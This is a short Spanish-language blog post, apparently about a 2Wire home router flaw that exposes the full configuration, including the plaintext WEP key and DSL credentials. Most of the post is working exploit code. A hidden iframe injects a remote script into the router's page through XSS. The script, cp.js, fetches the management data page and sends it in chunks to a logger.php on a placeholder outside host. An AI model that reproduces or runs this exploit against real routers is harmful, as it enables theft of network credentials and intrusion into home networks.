Fue publicado por primera vez con el nombre de “URL Mágico” lol. Esta página contiene la configuración completa del ruteador, incluyendo la clave WEP (en texto simple), credenciales DSL, MAC, y mucho más.
Se puede obtener este URL sniffeando la comunicacion con del programa del “Asistente”.
Revelación de Configuración Remota (*XSS + Config Disclosure)
-XSSvar
ImageObject = new Image();
ImageObject.src= "http://192.168.1.254/base/web/def/def/images/nav_sl_logo";
if(ImageObject.height>0){
var iframe = unescape('%3Ciframe%20name%3Diframe%20style%3D%22visibility%3A%20hidden%3B%22%20width%3D2%20height
%3D2%20src%3D%22http%3A//192.168.1.254/xslt%3FPAGE%3DH04%26THISPAGE%3D%3C/SCRIPT%3E%3D%3CSCRIPT%20SRC
%3Dhttp%3A//xxxx/cp.js%3E%3C/SCRIPT%3E%22%3E%3C/iframe%3E');
} else {
var iframe = unescape('%3Ciframe%20name%3Diframe%20style%3D%22visibility%3A%20hidden%3B%22%20width%3D2%20height
%3D2%20src%3D%22http%3A//gateway.2wire.net/xslt%3FPAGE%3DH04%26THISPAGE%3D%3C/SCRIPT%3E%3D%3CSCRIPT
%20SRC%3Dhttp%3A//xxxx/cp.js%3E%3C/SCRIPT%3E%22%3E%3C/iframe%3E');
}
document.write(iframe);
-cp.jsxmlhttp.
open("GET","/xslt?page=mgmt_data",false);
xmlhttp.send(null);
var doc = xmlhttp.responseText;
var h = parseInt(doc.length / 800)+1;
var k = 0;
var m = 0;
function statement1 () {
contenido = doc.substr(k,800);
k=k+800;
with(document)body.appendChild(createElement("script")).setAttribute("src","http://xxxx/logger.php?file="+contenido);
m++;
if (m>h){
clearInterval(tid);
}
}
var tid = setInterval('statement1()', 1000);
(obtiene remotamente el archivo completo de configuración)
No hay comentarios:
Publicar un comentario